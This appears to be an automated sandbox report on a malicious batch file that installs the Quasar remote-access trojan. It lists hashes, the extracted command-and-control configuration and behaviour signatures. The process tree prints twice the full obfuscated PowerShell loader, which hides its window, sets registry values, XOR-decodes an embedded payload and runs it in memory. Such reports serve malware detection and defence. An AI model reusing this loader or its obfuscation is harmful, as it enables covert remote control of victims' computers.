Analysis
-
max time kernel
134s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
submitted
19-12-2024 18:01
Static task
static1
Behavioral task
behavioral1
Sample
kk.cmd
Resource
win7-20241010-en
General
-
Target
kk.cmd
-
Size
4.2MB
-
MD5
dd89f166318c7640673dc83253874f85
-
SHA1
c6d10f65f6ff4df23404ac521f1d3db79264657e
-
SHA256
9c3d53c7723bfdd037df85de4c26efcd5e6f4ad58cc24f7a38a774bf22de3876
-
SHA512
c2c61f22626a862ad4622c98473ef62453e8c0f966e9a8f811f2ff3151af424215bab527a21fe3d7f7de44e674a2f116edc915e5774817acb401980ab27fcda5
-
SSDEEP
49152:r2wTjdVohnHVy2BvdhqhKFLHVr1vpvnIALaU8:J
Malware Config
Extracted
quasar
1.4.1
kdot
captchacdn.com:7000
989fc24d-b096-453b-836b-1510c023cb6a
-
encryption_key
608C2EF7FA3C5E6905B737821BA5F1BF71A72757
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/536-19-0x000001ABA5640000-0x000001ABA5964000-memory.dmp family_quasar -
Blocklisted process makes network request 6 IoCs
flow pid Process 17 536 powershell.exe 33 536 powershell.exe 40 536 powershell.exe 43 536 powershell.exe 50 536 powershell.exe 51 536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 536 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 536 powershell.exe 536 powershell.exe 536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 536 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 536 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 5020 wrote to memory of 1576 5020 cmd.exe 84 PID 5020 wrote to memory of 1576 5020 cmd.exe 84 PID 1576 wrote to memory of 536 1576 conhost.exe 85 PID 1576 wrote to memory of 536 1576 conhost.exe 85 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\kk.cmd" 1⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\conhost.execonhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\kk.cmd';${`KdotgWed`WfojJw} = .([char]((13 - 1378 - 3780 + 5216))+[char](((4676 -Band 1964) + (4676 -Bor 1964) + 3244 - 9783))+[char]((10304 - 110 - 501 - 9577))+[char](((-15629 -Band 8806) + (-15629 -Bor 8806) + 5769 + 1099))+[char]((7825 - 8014 - 2335 + 2591))+[char](((-5358 -Band 8947) + (-5358 -Bor 8947) - 8209 + 4731))+[char]((18347 - 9370 - 2385 - 6482))+[char]((15441 - 1573 - 3971 - 9781))+[char](((-16233 -Band 2524) + (-16233 -Bor 2524) + 6390 + 7420))+[char](((-9714 -Band 5556) + (-9714 -Bor 5556) - 42 + 4310))+[char](((-739 -Band 7118) + (-739 -Bor 7118) + 358 - 6621))) $Kdot_fIle -Raw;${kd`OtyMlvypznrx} = ([System.texT.eNcODiNG]::UtF8.GetStRIng((0x48, 0x4b, 67, 0x55, 0x3a, 92, 83, 0x6f, 0x66, 116, 119, 0x61, 0x72, 0x65, 0x5c, 0x43, 0x68, 0x72, 111, 109)) + [SYstem.TexT.eNCOdIng]::utF8.GETsTrInG((101, 85, 112, 100, 97, 116, 101)));if (-not (.([char](((-11673 -Band 6638) + (-11673 -Bor 6638) - 1202 + 6321))+[char]((11389 - 5688 + 2237 - 7837))+[char](((4283 -Band 7213) + (4283 -Bor 7213) - 6589 - 4792))+[char]((-7138 - 7728 + 9322 + 5660))+[char]((-1708 - 2423 + 9091 - 4915))+[char](((-1052 -Band 3453) + (-1052 -Bor 3453) - 6782 + 4461))+[char]((8989 - 6838 - 4852 + 2798))+[char](((2556 -Band 2244) + (2556 -Bor 2244) + 4520 - 9204))+[char]((3135 - 8793 + 4478 + 1284))) ${kd`Otym`LvYpZnrx})) { .([char](((6306 -Band 1379) + (6306 -Bor 1379) + 1030 - 8637))+[char]((4345 - 8871 - 5118 + 9745))+[char]((11644 - 9472 + 415 - 2468))+[char]((-4904 - 8931 + 6266 + 7614))+[char](((1636 -Band 9043) + (1636 -Bor 9043) - 7129 - 3477))+[char]((2317 - 8117 + 6579 - 663))+[char](((-8980 -Band 9997) + (-8980 -Bor 9997) + 6956 - 7872))+[char](((-5852 -Band 9977) + (-5852 -Bor 9977) - 6312 + 2296))) -Path ${kdOt`Ymlv`Ypznrx} -Force };1..3 | .([char]((13652 - 3627 - 164 - 9824))) {.([char]((-11298 - 1866 + 3254 + 9993))+[char](((-1551 -Band 5849) + 
(-1551 -Bor 5849) + 4465 - 8662))+[char]((-5499 - 7553 + 7140 + 6028))+[char](((1649 -Band 7342) + (1649 -Bor 7342) - 4704 - 4242))+[char]((-3070 - 3172 + 5411 + 904))+[char]((7010 - 5201 + 7155 - 8848))+[char](((-11871 -Band 2986) + (-11871 -Bor 2986) + 9632 - 646))+[char]((412 - 5856 + 5980 - 427))+[char](((4457 -Band 7882) + (4457 -Bor 7882) - 7084 - 5175))+[char]((6474 - 8821 + 2738 - 277))+[char](((-12218 -Band 6766) + (-12218 -Bor 6766) + 7285 - 1722))+[char](((-10210 -Band 6774) + (-10210 -Bor 6774) + 8883 - 5335))+[char](((6092 -Band 3541) + (6092 -Bor 3541) - 3025 - 6507))+[char](((-16166 -Band 7383) + (-16166 -Bor 7383) + 9786 - 889))+[char]((3038 - 9578 + 1566 + 5090))+[char](((6145 -Band 7511) + (6145 -Bor 7511) - 6325 - 7210))) -Path ${kdOtYMlvyPznrx} -Name (([SysteM.TexT.ENcodinG]::UTf8.GEtsTRINg((75, 0x44, 0x4f)) + [system.teXt.EncODiNG]::UTF8.GetStRIng([SySTem.cONVert]::FroMbASe64StRING('VA==')))+$_) -Value (${`K`DoTg`WeDWf`Ojjw} | .([char](((-14443 -Band 7542) + (-14443 -Bor 7542) + 2962 + 4022))+[char]((16547 - 3435 - 9446 - 3565))+[char](((5939 -Band 951) + (5939 -Bor 951) - 603 - 6179))+[char]((25941 - 9295 - 7714 - 8831))+[char](((-14658 -Band 1515) + (-14658 -Bor 1515) + 6571 + 6671))+[char](((-6324 -Band 2857) + (-6324 -Bor 2857) - 32 + 3615))+[char](((15470 -Band 479) + (15470 -Bor 479) - 8463 - 7441))+[char](((4576 -Band 3834) + (4576 -Bor 3834) + 764 - 9091))+[char](((-12277 -Band 6674) + (-12277 -Bor 6674) - 1246 + 6965))+[char]((-2008 - 2344 + 4447 + 19))+[char](((7728 -Band 5699) + (7728 -Bor 5699) - 8958 - 4364))+[char](((-1171 -Band 8519) + (-1171 -Bor 8519) - 285 - 6953))+[char]((1491 - 849 - 5289 + 4750))) -Pattern (([sYStEm.TexT.enCODInG]::UTF8.GEtSTrInG((58, 0x4b, 68)) + [SysTeM.tExt.eNCOdIng]::uTf8.GeTSTRiNG((0x4f, 0x54)))+$_+([sysTEm.Text.ENCodInG]::utF8.GetsTriNG((0x3a, 0x3a, 0x28)) + [sYstEm.tEXT.enCodIng]::UTf8.gETStrInG((46, 42)) + [sYSTeM.teXT.eNcoDiNg]::UtF8.GetStRing((0x29))))).matCHEs.gRoUPs[1].vAluE 
-Force};.([char]((934 - 8315 + 4511 + 2953))+[char]((6910 - 9015 + 9487 - 7281))+[char]((8374 - 9248 + 9141 - 8151))+[char](((9002 -Band 3523) + (9002 -Bor 3523) - 9834 - 2646))+[char](((3172 -Band 7600) + (3172 -Bor 7600) - 1242 - 9457))+[char](((174 -Band 7378) + (174 -Bor 7378) - 7613 + 177))+[char](((-22737 -Band 7186) + (-22737 -Bor 7186) + 9850 + 5802))+[char](((-13731 -Band 671) + (-13731 -Bor 671) + 4826 + 8343))+[char](((-13519 -Band 9113) + (-13519 -Bor 9113) + 338 + 4148))+[char](((-12650 -Band 4594) + (-12650 -Bor 4594) - 971 + 9141))+[char](((6095 -Band 3270) + (6095 -Bor 3270) - 6816 - 2438))+[char]((22276 - 8612 - 3677 - 9875))+[char]((3860 - 7729 + 5642 - 1672))+[char](((3457 -Band 2667) + (3457 -Bor 2667) - 9936 + 3926))+[char]((9435 - 551 - 9637 + 869))+[char](((5027 -Band 6422) + (5027 -Bor 6422) - 9585 - 1743))) -Path ${kdotYmlvYpznrx} -Name ([SyStem.TeXT.ENCODinG]::utF8.GeTsTriNG([sysTem.CoNverT]::FROMbASe64STRing('S0RP')) + [SyStem.TEXt.enCodING]::utF8.GetStRINg((0x54, 0x34))) -Value ([sySTEm.teXt.encODINg]::uTF8.GeTsTRiNG((0x7a, 0x39, 0x61, 0x4d, 0x6c, 0x35, 0x57, 0x44, 0x43, 0x55, 0x4f, 0x6b, 0x37, 0x42, 0x4e, 0x34))) -Force;${KdOt`MjQ`N`VwecpW} = [SyStem.Text.eNcoDing]::UTf8.GEtbyTES((.([char]((14702 - 6998 + 113 - 7746))+[char](((8253 -Band 2702) + (8253 -Bor 2702) - 4927 - 5927))+[char](((-7844 -Band 9851) + (-7844 -Bor 9851) - 2777 + 886))+[char]((-13280 - 2082 + 8548 + 6859))+[char](((-8699 -Band 9563) + (-8699 -Bor 9563) + 4687 - 5478))+[char]((878 - 896 - 302 + 436))+[char]((11225 - 3972 - 7490 + 338))+[char]((-5341 - 8147 + 4227 + 9370))+[char]((-7848 - 4210 + 4385 + 7753))+[char]((-2173 - 968 + 691 + 2564))+[char](((-22715 -Band 9259) + (-22715 -Bor 9259) + 3653 + 9914))+[char](((-5947 -Band 5212) + (-5947 -Bor 5212) - 237 + 1084))+[char]((6804 - 243 - 6867 + 407))+[char](((-103 -Band 1345) + (-103 -Bor 1345) - 1654 + 526))+[char](((-2605 -Band 4830) + (-2605 -Bor 4830) - 9666 + 7557))+[char]((12848 - 7662 - 9177 + 4112))) -Path 
${KdOtym`Lvy`P`Znrx} KDOT4).kDOT4);${KDOtnpTIeKZsez} = [conVert]::fRoMbase64StRInG((.([char]((4388 - 7071 + 2774 - 20))+[char]((1699 - 9928 - 1346 + 9676))+[char](((2716 -Band 723) + (2716 -Bor 723) + 335 - 3658))+[char](((9601 -Band 1692) + (9601 -Bor 1692) - 7558 - 3690))+[char]((8426 - 3054 - 6911 + 1612))+[char]((-6327 - 4578 + 8457 + 2564))+[char](((-16629 -Band 7610) + (-16629 -Bor 7610) + 8111 + 1009))+[char](((-12364 -Band 5587) + (-12364 -Bor 5587) + 1664 + 5222))+[char]((10883 - 3871 - 3704 - 3228))+[char]((10287 - 1089 - 822 - 8262))+[char](((5500 -Band 5314) + (5500 -Bor 5314) - 5527 - 5176))+[char]((20237 - 8692 - 5360 - 6073))+[char](((56 -Band 2560) + (56 -Bor 2560) - 3107 + 592))+[char](((-1619 -Band 4538) + (-1619 -Bor 4538) - 6034 + 3229))+[char]((-10383 - 624 + 2341 + 8782))+[char](((-15145 -Band 6387) + (-15145 -Bor 6387) + 8799 + 80))) -Path ${kDotYMLvYpznrX} KDOT1).kDOT1);${kdOtaelspVrPCf} = [byTE[]]::NEW(${KDotnPTiek`ZSez}.LenGTH);for (${KDO`TvByytHcxDm}=0;${`KdotvB`Yyth`CxDm} -lt ${kDoTnptIEkzSez}.LengTH;${KdoTvb`YYtHc`Xd`M}++) {${kdOt`AelSp`VrpCf}[${kdOtvBYythcXdm}]=${`KdO`TnPT`I`Ekz`SEZ}[${`Kd`OtvbY`YtH`CxDm}] -bxor ${Kdot`Mj`Qnv`Wec`PW}[${kDoTvbyYthCX`Dm} % ${KDOtMJqNVwecp`W}.LeNGth]};[sySTEm.REFlECTiOn.ASsEmBLy]::LOaD(${`KdOtae`LsPvr`P`Cf}).eNTrYPoiNt.INvoKE($null,@(,[string[]]@()))"2⤵
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\kk.cmd';${`KdotgWed`WfojJw} = .([char]((13 - 1378 - 3780 + 5216))+[char](((4676 -Band 1964) + (4676 -Bor 1964) + 3244 - 9783))+[char]((10304 - 110 - 501 - 9577))+[char](((-15629 -Band 8806) + (-15629 -Bor 8806) + 5769 + 1099))+[char]((7825 - 8014 - 2335 + 2591))+[char](((-5358 -Band 8947) + (-5358 -Bor 8947) - 8209 + 4731))+[char]((18347 - 9370 - 2385 - 6482))+[char]((15441 - 1573 - 3971 - 9781))+[char](((-16233 -Band 2524) + (-16233 -Bor 2524) + 6390 + 7420))+[char](((-9714 -Band 5556) + (-9714 -Bor 5556) - 42 + 4310))+[char](((-739 -Band 7118) + (-739 -Bor 7118) + 358 - 6621))) $Kdot_fIle -Raw;${kd`OtyMlvypznrx} = ([System.texT.eNcODiNG]::UtF8.GetStRIng((0x48, 0x4b, 67, 0x55, 0x3a, 92, 83, 0x6f, 0x66, 116, 119, 0x61, 0x72, 0x65, 0x5c, 0x43, 0x68, 0x72, 111, 109)) + [SYstem.TexT.eNCOdIng]::utF8.GETsTrInG((101, 85, 112, 100, 97, 116, 101)));if (-not (.([char](((-11673 -Band 6638) + (-11673 -Bor 6638) - 1202 + 6321))+[char]((11389 - 5688 + 2237 - 7837))+[char](((4283 -Band 7213) + (4283 -Bor 7213) - 6589 - 4792))+[char]((-7138 - 7728 + 9322 + 5660))+[char]((-1708 - 2423 + 9091 - 4915))+[char](((-1052 -Band 3453) + (-1052 -Bor 3453) - 6782 + 4461))+[char]((8989 - 6838 - 4852 + 2798))+[char](((2556 -Band 2244) + (2556 -Bor 2244) + 4520 - 9204))+[char]((3135 - 8793 + 4478 + 1284))) ${kd`Otym`LvYpZnrx})) { .([char](((6306 -Band 1379) + (6306 -Bor 1379) + 1030 - 8637))+[char]((4345 - 8871 - 5118 + 9745))+[char]((11644 - 9472 + 415 - 2468))+[char]((-4904 - 8931 + 6266 + 7614))+[char](((1636 -Band 9043) + (1636 -Bor 9043) - 7129 - 3477))+[char]((2317 - 8117 + 6579 - 663))+[char](((-8980 -Band 9997) + (-8980 -Bor 9997) + 6956 - 7872))+[char](((-5852 -Band 9977) + (-5852 -Bor 9977) - 6312 + 2296))) -Path ${kdOt`Ymlv`Ypznrx} -Force };1..3 | .([char]((13652 - 3627 - 164 - 9824))) {.([char]((-11298 - 1866 + 3254 + 9993))+[char](((-1551 -Band 
5849) + (-1551 -Bor 5849) + 4465 - 8662))+[char]((-5499 - 7553 + 7140 + 6028))+[char](((1649 -Band 7342) + (1649 -Bor 7342) - 4704 - 4242))+[char]((-3070 - 3172 + 5411 + 904))+[char]((7010 - 5201 + 7155 - 8848))+[char](((-11871 -Band 2986) + (-11871 -Bor 2986) + 9632 - 646))+[char]((412 - 5856 + 5980 - 427))+[char](((4457 -Band 7882) + (4457 -Bor 7882) - 7084 - 5175))+[char]((6474 - 8821 + 2738 - 277))+[char](((-12218 -Band 6766) + (-12218 -Bor 6766) + 7285 - 1722))+[char](((-10210 -Band 6774) + (-10210 -Bor 6774) + 8883 - 5335))+[char](((6092 -Band 3541) + (6092 -Bor 3541) - 3025 - 6507))+[char](((-16166 -Band 7383) + (-16166 -Bor 7383) + 9786 - 889))+[char]((3038 - 9578 + 1566 + 5090))+[char](((6145 -Band 7511) + (6145 -Bor 7511) - 6325 - 7210))) -Path ${kdOtYMlvyPznrx} -Name (([SysteM.TexT.ENcodinG]::UTf8.GEtsTRINg((75, 0x44, 0x4f)) + [system.teXt.EncODiNG]::UTF8.GetStRIng([SySTem.cONVert]::FroMbASe64StRING('VA==')))+$_) -Value (${`K`DoTg`WeDWf`Ojjw} | .([char](((-14443 -Band 7542) + (-14443 -Bor 7542) + 2962 + 4022))+[char]((16547 - 3435 - 9446 - 3565))+[char](((5939 -Band 951) + (5939 -Bor 951) - 603 - 6179))+[char]((25941 - 9295 - 7714 - 8831))+[char](((-14658 -Band 1515) + (-14658 -Bor 1515) + 6571 + 6671))+[char](((-6324 -Band 2857) + (-6324 -Bor 2857) - 32 + 3615))+[char](((15470 -Band 479) + (15470 -Bor 479) - 8463 - 7441))+[char](((4576 -Band 3834) + (4576 -Bor 3834) + 764 - 9091))+[char](((-12277 -Band 6674) + (-12277 -Bor 6674) - 1246 + 6965))+[char]((-2008 - 2344 + 4447 + 19))+[char](((7728 -Band 5699) + (7728 -Bor 5699) - 8958 - 4364))+[char](((-1171 -Band 8519) + (-1171 -Bor 8519) - 285 - 6953))+[char]((1491 - 849 - 5289 + 4750))) -Pattern (([sYStEm.TexT.enCODInG]::UTF8.GEtSTrInG((58, 0x4b, 68)) + [SysTeM.tExt.eNCOdIng]::uTf8.GeTSTRiNG((0x4f, 0x54)))+$_+([sysTEm.Text.ENCodInG]::utF8.GetsTriNG((0x3a, 0x3a, 0x28)) + [sYstEm.tEXT.enCodIng]::UTf8.gETStrInG((46, 42)) + [sYSTeM.teXT.eNcoDiNg]::UtF8.GetStRing((0x29))))).matCHEs.gRoUPs[1].vAluE 
-Force};.([char]((934 - 8315 + 4511 + 2953))+[char]((6910 - 9015 + 9487 - 7281))+[char]((8374 - 9248 + 9141 - 8151))+[char](((9002 -Band 3523) + (9002 -Bor 3523) - 9834 - 2646))+[char](((3172 -Band 7600) + (3172 -Bor 7600) - 1242 - 9457))+[char](((174 -Band 7378) + (174 -Bor 7378) - 7613 + 177))+[char](((-22737 -Band 7186) + (-22737 -Bor 7186) + 9850 + 5802))+[char](((-13731 -Band 671) + (-13731 -Bor 671) + 4826 + 8343))+[char](((-13519 -Band 9113) + (-13519 -Bor 9113) + 338 + 4148))+[char](((-12650 -Band 4594) + (-12650 -Bor 4594) - 971 + 9141))+[char](((6095 -Band 3270) + (6095 -Bor 3270) - 6816 - 2438))+[char]((22276 - 8612 - 3677 - 9875))+[char]((3860 - 7729 + 5642 - 1672))+[char](((3457 -Band 2667) + (3457 -Bor 2667) - 9936 + 3926))+[char]((9435 - 551 - 9637 + 869))+[char](((5027 -Band 6422) + (5027 -Bor 6422) - 9585 - 1743))) -Path ${kdotYmlvYpznrx} -Name ([SyStem.TeXT.ENCODinG]::utF8.GeTsTriNG([sysTem.CoNverT]::FROMbASe64STRing('S0RP')) + [SyStem.TEXt.enCodING]::utF8.GetStRINg((0x54, 0x34))) -Value ([sySTEm.teXt.encODINg]::uTF8.GeTsTRiNG((0x7a, 0x39, 0x61, 0x4d, 0x6c, 0x35, 0x57, 0x44, 0x43, 0x55, 0x4f, 0x6b, 0x37, 0x42, 0x4e, 0x34))) -Force;${KdOt`MjQ`N`VwecpW} = [SyStem.Text.eNcoDing]::UTf8.GEtbyTES((.([char]((14702 - 6998 + 113 - 7746))+[char](((8253 -Band 2702) + (8253 -Bor 2702) - 4927 - 5927))+[char](((-7844 -Band 9851) + (-7844 -Bor 9851) - 2777 + 886))+[char]((-13280 - 2082 + 8548 + 6859))+[char](((-8699 -Band 9563) + (-8699 -Bor 9563) + 4687 - 5478))+[char]((878 - 896 - 302 + 436))+[char]((11225 - 3972 - 7490 + 338))+[char]((-5341 - 8147 + 4227 + 9370))+[char]((-7848 - 4210 + 4385 + 7753))+[char]((-2173 - 968 + 691 + 2564))+[char](((-22715 -Band 9259) + (-22715 -Bor 9259) + 3653 + 9914))+[char](((-5947 -Band 5212) + (-5947 -Bor 5212) - 237 + 1084))+[char]((6804 - 243 - 6867 + 407))+[char](((-103 -Band 1345) + (-103 -Bor 1345) - 1654 + 526))+[char](((-2605 -Band 4830) + (-2605 -Bor 4830) - 9666 + 7557))+[char]((12848 - 7662 - 9177 + 4112))) -Path 
${KdOtym`Lvy`P`Znrx} KDOT4).kDOT4);${KDOtnpTIeKZsez} = [conVert]::fRoMbase64StRInG((.([char]((4388 - 7071 + 2774 - 20))+[char]((1699 - 9928 - 1346 + 9676))+[char](((2716 -Band 723) + (2716 -Bor 723) + 335 - 3658))+[char](((9601 -Band 1692) + (9601 -Bor 1692) - 7558 - 3690))+[char]((8426 - 3054 - 6911 + 1612))+[char]((-6327 - 4578 + 8457 + 2564))+[char](((-16629 -Band 7610) + (-16629 -Bor 7610) + 8111 + 1009))+[char](((-12364 -Band 5587) + (-12364 -Bor 5587) + 1664 + 5222))+[char]((10883 - 3871 - 3704 - 3228))+[char]((10287 - 1089 - 822 - 8262))+[char](((5500 -Band 5314) + (5500 -Bor 5314) - 5527 - 5176))+[char]((20237 - 8692 - 5360 - 6073))+[char](((56 -Band 2560) + (56 -Bor 2560) - 3107 + 592))+[char](((-1619 -Band 4538) + (-1619 -Bor 4538) - 6034 + 3229))+[char]((-10383 - 624 + 2341 + 8782))+[char](((-15145 -Band 6387) + (-15145 -Bor 6387) + 8799 + 80))) -Path ${kDotYMLvYpznrX} KDOT1).kDOT1);${kdOtaelspVrPCf} = [byTE[]]::NEW(${KDotnPTiek`ZSez}.LenGTH);for (${KDO`TvByytHcxDm}=0;${`KdotvB`Yyth`CxDm} -lt ${kDoTnptIEkzSez}.LengTH;${KdoTvb`YYtHc`Xd`M}++) {${kdOt`AelSp`VrpCf}[${kdOtvBYythcXdm}]=${`KdO`TnPT`I`Ekz`SEZ}[${`Kd`OtvbY`YtH`CxDm}] -bxor ${Kdot`Mj`Qnv`Wec`PW}[${kDoTvbyYthCX`Dm} % ${KDOtMJqNVwecp`W}.LeNGth]};[sySTEm.REFlECTiOn.ASsEmBLy]::LOaD(${`KdOtae`LsPvr`P`Cf}).eNTrYPoiNt.INvoKE($null,@(,[string[]]@()))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:536
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82